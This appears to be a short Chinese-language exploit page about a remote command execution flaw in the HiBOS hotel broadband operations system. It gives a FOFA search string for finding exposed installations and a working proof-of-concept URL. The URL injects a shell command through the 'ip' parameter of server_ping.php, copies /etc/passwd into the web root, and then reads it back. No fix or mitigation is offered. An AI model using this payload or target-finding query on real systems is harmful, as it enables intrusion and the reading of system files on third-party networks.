HiBOS酒店宽带运营系统RCE漏洞-棉花糖会员站

# HiBOS酒店宽带运营系统RCE漏洞

## 漏洞描述

HiBOS酒店宽带运营系统存在RCE漏洞，攻击者可以通过此漏洞执行任意命令。

## 漏洞影响

> HiBOS酒店宽带运营系统

## FOFA

> body=”酒店宽带运营系统”

## POC

登录界面如下

![1](/static/qingy/HiBOS酒店宽带运营系统RCE漏洞/img/1.jpg)

##POC

执行命令输出etc/password内容到mb.txt

“`
http://xx.xx.xx.xx/manager/radius/server_ping.php?ip=127.0.0.1|cat /etc/passwd >../../mb.txt&id=1
“`

![2](/static/qingy/HiBOS酒店宽带运营系统RCE漏洞/img/2.jpg)

然后访问http://xx.xx.xx.xx/mb.txt就可以看到了

文章版权归作者所有，未经允许请勿转载。

THE END

HiBOS酒店宽带运营系统RCE漏洞